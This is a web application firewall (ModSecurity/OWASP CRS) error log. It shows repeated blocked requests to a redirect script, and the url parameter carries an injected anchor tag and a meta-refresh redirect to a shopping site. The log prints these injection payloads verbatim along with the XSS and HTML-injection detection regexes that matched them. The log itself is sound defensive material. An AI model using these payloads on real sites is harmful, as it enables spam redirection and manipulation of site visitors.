[Tue May 12 06:27:23.113825 2026] [security2:error] [pid 1825179:tid 1825197] [client 27.78.84.116:59584] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK9r1yOh9TvizeziwzgAAAEA"]
[Tue May 12 06:27:23.114402 2026] [security2:error] [pid 1825179:tid 1825197] [client 27.78.84.116:59584] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh c..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK9r1yOh9TvizeziwzgAAAEA"]
[Tue May 12 06:27:23.114607 2026] [security2:error] [pid 1825179:tid 1825197] [client 27.78.84.116:59584] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK9r1yOh9TvizeziwzgAAAEA"]
[Tue May 12 06:27:23.114732 2026] [security2:error] [pid 1825179:tid 1825197] [client 27.78.84.116:59584] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK9r1yOh9TvizeziwzgAAAEA"]
[Tue May 12 06:27:23.114923 2026] [security2:error] [pid 1825179:tid 1825197] [client 27.78.84.116:59584] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK9r1yOh9TvizeziwzgAAAEA"]
[Tue May 12 06:27:23.115373 2026] [security2:error] [pid 1825179:tid 1825197] [client 27.78.84.116:59584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK9r1yOh9TvizeziwzgAAAEA"]
[Tue May 12 06:27:23.115735 2026] [security2:error] [pid 1825179:tid 1825197] [client 27.78.84.116:59584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK9r1yOh9TvizeziwzgAAAEA"]
[Tue May 12 06:27:23.814693 2026] [security2:error] [pid 1844863:tid 1844871] [client 27.78.84.116:59653] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK_aAnTZtx1_H_wzJywAAAUI"]
[Tue May 12 06:27:23.815092 2026] [security2:error] [pid 1844863:tid 1844871] [client 27.78.84.116:59653] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh c..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK_aAnTZtx1_H_wzJywAAAUI"]
[Tue May 12 06:27:23.815244 2026] [security2:error] [pid 1844863:tid 1844871] [client 27.78.84.116:59653] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK_aAnTZtx1_H_wzJywAAAUI"]
[Tue May 12 06:27:23.815359 2026] [security2:error] [pid 1844863:tid 1844871] [client 27.78.84.116:59653] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK_aAnTZtx1_H_wzJywAAAUI"]
[Tue May 12 06:27:23.815530 2026] [security2:error] [pid 1844863:tid 1844871] [client 27.78.84.116:59653] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK_aAnTZtx1_H_wzJywAAAUI"]
[Tue May 12 06:27:23.815949 2026] [security2:error] [pid 1844863:tid 1844871] [client 27.78.84.116:59653] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK_aAnTZtx1_H_wzJywAAAUI"]
[Tue May 12 06:27:23.816222 2026] [security2:error] [pid 1844863:tid 1844871] [client 27.78.84.116:59653] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsK_aAnTZtx1_H_wzJywAAAUI"]
[Tue May 12 06:27:24.526943 2026] [security2:error] [pid 1820198:tid 1820224] [client 27.78.84.116:59740] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLM1tk6y7yBJLpJpIRQAAAJg"]
[Tue May 12 06:27:24.527341 2026] [security2:error] [pid 1820198:tid 1820224] [client 27.78.84.116:59740] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh c..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLM1tk6y7yBJLpJpIRQAAAJg"]
[Tue May 12 06:27:24.527495 2026] [security2:error] [pid 1820198:tid 1820224] [client 27.78.84.116:59740] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLM1tk6y7yBJLpJpIRQAAAJg"]
[Tue May 12 06:27:24.527610 2026] [security2:error] [pid 1820198:tid 1820224] [client 27.78.84.116:59740] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLM1tk6y7yBJLpJpIRQAAAJg"]
[Tue May 12 06:27:24.527784 2026] [security2:error] [pid 1820198:tid 1820224] [client 27.78.84.116:59740] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLM1tk6y7yBJLpJpIRQAAAJg"]
[Tue May 12 06:27:24.528193 2026] [security2:error] [pid 1820198:tid 1820224] [client 27.78.84.116:59740] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLM1tk6y7yBJLpJpIRQAAAJg"]
[Tue May 12 06:27:24.528453 2026] [security2:error] [pid 1820198:tid 1820224] [client 27.78.84.116:59740] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLM1tk6y7yBJLpJpIRQAAAJg"]
[Tue May 12 06:27:25.219699 2026] [security2:error] [pid 1842385:tid 1842410] [client 27.78.84.116:59817] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLRs7kySIUZ3ORnI41QAAARM"]
[Tue May 12 06:27:25.220117 2026] [security2:error] [pid 1842385:tid 1842410] [client 27.78.84.116:59817] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh c..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsLRs7kySIUZ3ORnI41QAAARM"]
